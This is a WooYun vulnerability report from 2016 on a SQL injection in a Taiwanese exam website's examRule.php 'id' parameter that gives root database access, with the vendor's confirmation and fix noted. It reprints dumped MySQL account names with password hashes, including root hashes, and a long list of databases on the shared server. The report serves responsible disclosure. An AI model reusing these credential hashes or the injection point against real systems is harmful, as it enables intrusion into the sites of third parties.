当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0170177

漏洞标题:考友社SQL注入ROOT权限358库(臺灣地區)

相关厂商:考友社

漏洞作者: 龍 、

提交时间:2016-01-17 10:33

修复时间:2016-02-18 18:00

公开时间:2016-02-18 18:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态: 已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-01-17: 细节已通知厂商并且等待厂商处理中
2016-01-20: 厂商已经确认,细节仅向厂商公开
2016-01-30: 细节向核心白帽子及相关领域专家公开
2016-02-09: 细节向普通白帽子公开
2016-02-18: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

RT

详细说明:

Target: 		http://**.**.**.**/examRule.php?id=1
Host IP:		**.**.**.**
Web Server: 	Apache/2.2.15 (CentOS)
Powered-by: 	PHP/5.3.3
DB Server: 	MySQL >=5
Resp. Time(avg):	5088 ms
Current User: 	lin23765@localhost
Sql Version: 	5.1.73-log
Current DB: 	examiner
System User: 	lin23765@localhost
Host Name: 	**.**.**.**
Installation dir: 	/usr/
DB User & Pass: 	adobereader:74f2a98e5905be38:localhost
Compile OS: 	redhat-linux-gnu
		newdz:7edc72147a2157ce:localhost
		dz5:74f2a98e5905be38:localhost
		photo:74f2a98e5905be38:localhost
		lin23765:01180b4f0e3930a8:%
		phpbb3:74f2a98e5905be38:localhost
		urpet:74f2a98e5905be38:localhost
		realplayer:74f2a98e5905be38:localhost
		wiki:74f2a98e5905be38:localhost
		cutebox:74f2a98e5905be38:localhost
		sfs3man:74f2a98e5905be38:localhost
		cactiuser:142bb1aa1e6a5804:localhost
		mytest:74f2a98e5905be38:localhost
		plastic-life:033139551b8802ef:localhost
		new-mytest:74f2a98e5905be38:%
		dz-yuyn:74f2a98e5905be38:localhost
		lin23765:01180b4f0e3930a8:**.**.**.**
		tccsj_admin:5e26246f1da48c6f:localhost
		phplistdb:4b955ee442259e54:%
		s8anye98u:1a0a481008605fe6:localhost
		ifunsun:670026d9413739d4:localhost
		lohasers:53bdc13709eb3550:localhost
		cherry:41eca5b8304aa5d6:localhost
		root:38d145490622ba92:localhost
		db43a:75ceb3e559a4bbc2:%
		root:38d145490622ba92:**.**.**.**
		wikii:4e81f01b200ffe29:%
		mytest:4e81f01b200ffe29:%
		sfs3addman:74f2a98e5905be38:localhost
		lamerclinic:4825d8553b58ecc0:localhost
		root:565491d704013245:%
		jian:57b46ebb6aad008f:web1
		jian:57b46ebb6aad008f:localhost
		lamerc123:4a89d1b90ee40032:localhost
		lin23765:01180b4f0e3930a8:localhost
		rfchen:*2BF08A842A594ACC953F1EA6EE8520A93BD4D561:localhost
		jgn03k12:*8506A9374AEF8EFAC23CE6AD27213F2F22C26B69:localhost
		goldcordyceps:*3D1ECD9D585EC55D86715428E39B0B69041FF0CA:localhost
		arttest:lin23765:localhost
		mchogs:*133A54B37D9F02DB588AF626BEBD0CC86FE20D5C:localhost
Data Bases: 	information_schema
		109tech
		APower
		DBL02420
		abs
		abs3
		abspos
		adobereader
		aou
		aplushotel
		arashi
		arttest
		arttool
		#mysql50#az-instrument
		az-instrument
		azinstrument
		azinstrument2
		azinstrument3
		bai_con
		bklweb
		bluerainnew
		blueraintest
		bluetest
		bluetest2
		bluewell
		bri
		bri1
		brknow
		brs
		bss
		btmmedical
		btmweb
		buffet
		bullcitybulldogs
		cacti
		capsweb
		carolnice
		carrental
		caruso-proaudio
		casaweb
		cflower
		chalet
		chanceweb
		changwang
		charm3c
		chen
		cheni
		cjing
		columbia
		comma
		concentricweb
		conlight
		cook99n
		copsdc
		copsdc2
		copsdc4
		create
		create4
		creatmeday
		cutebox
		cyshopping
		daci
		daintest
		dalin
		db1
		db2
		demobluerain
		detal
		direct
		direct2
		direct_bk20120804
		direct_test
		directtest
		dmtest
		dmweb
		doctor
		dojo
		doubleweb
		durq
		eaonweb
		eastwind
		eastwind4
		eastwind4test
		eip
		eip2
		environmental
		essenlife
		eta
		europe
		europeeip
		europenew
		europeweb
		everyday
		examiner
		eyedoc
		ezcar
		falcon
		fame
		fieldcenter
		fonji
		foodstore
		foodstore2
		fresh
		funbagpos
		gallery3
		gaoyuanyu
		genmes
		genyen
		gobrother
		goldcordyceps
		goldenage
		golfclub
		gtaiweb
		haiching
		haichingtest
		hair
		hannkuen
		hawk
		he-sheng
		hiq
		hongway
		house_xcoode
		ies
		intoits
		invoice
		ipower
		iss
		iss2
		its
		jack
		jangmaw
		jgerp
		jhcomtw_house
		jiannweb
		jiatengu_trans
		jining
		jinxu
		joweb
		jowebtest
		jpower
		jpowernew
		jufeng
		jungxin
		kaihung
		kaohsiungweb
		kayeastlee
		kayeastlee2
		keepfit_db
		keepit
		khr
		kius2
		kius3
		kiuspos
		kiuspos2
		kiustest
		kiustt
		ktcloth
		ktcreativeweb
		ktest
		ktvweb
		kuo_pro2000
		kuo_waipu3
		kuo_yaza2
		kuoaz
		kuoshop
		kyuniform
		lamer
		lamerc123
		lamerclinic
		lamerclinic2
		lamerclinicnew
		leculture
		lees
		lees_BackUp
		leicht
		#mysql50#leicht-temp
		leichttemp
		living
		lohasers
		loseweight
		losproviders
		machineryweb
		mail
		maylin
		mchogs
		mdlaiweb
		metolash
		mhrose
		mingdaweb
		mingweb
		moonweb
		motex
		murgen
		mushop
		muweb
		mysql
		mytest
		newdz
		newkius
		newkius3
		nokidn
		nokita
		nsyc
		ogyen
		okmortgage
		padma
		padova
		panstrong
		partsourcing
		pcbike
		pethome
		philip
		phoenix
		phplistdb
		physicalweb
		physicians
		plastic
		#mysql50#plastic-life
		police
		pro2000
		processed
		proess
		propetcare
		raisinglight
		rfchen
		rianmom
		riseweb
		rosedog
		rotenweb
		royalweb
		rueryhsing
		sagency
		sakura
		sanyeu
		sanyeu2
		sanyeu3
		sarchy
		school_details
		schools
		schools2
		schools5
		schools_new
		sdc
		sdc2
		sdpc
		se05
		securitylux
		seo2
		seo3
		seo4
		seo5
		seo6
		service2_db
		service_db
		sfs3
		shaliandun
		shaliandunweb
		sheng
		shengkaoti
		sheyyo
		shibainu
		shining
		shmc
		site
		sitestar
		skylight
		slf
		smalldr
		smallisland
		smith
		starglory
		stc
		stlife
		studt
		sunhouse
		sunlight
		sunupmaster
		suzuki
		tainanshopping
		tainanttm
		tainanweb
		taining
		taining7_DBUtf
		tainingnew
		taipeitemplate
		tccsj_db
		tcpb_news
		template
		test
		test1
		testkius
		tianfu
		tkt
		tnejpco_db
		torvo
		tourismbureau
		#mysql50#tp-flower2
		tpflower
		tpflower3
		trainingdog
		tsu_mien
		tszen
		turvo
		ultrax
		unitop
		urpet
		vdemo
		vegetables
		waipu2
		waipu3
		waipunew
		wangsbakery
		water
		wblog
		webold
		weiweb
		wilita
		wordpress
		worldway
		yahoo1
		ydkweb
		yes3c
		yili
		yingtai
		yongbao
		yoyo
		yuanjing
		yuihotsh
		yungchi

漏洞证明:

http://**.**.**.**/examRule.php?id=1


11.png


1.png


2.png

3.png


4.png


5.png


6.png


修复方案:

版权声明:转载请注明来源 龍 、@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2016-01-20 01:05

厂商回复:

感謝通報

最新状态:

2016-02-18:已修復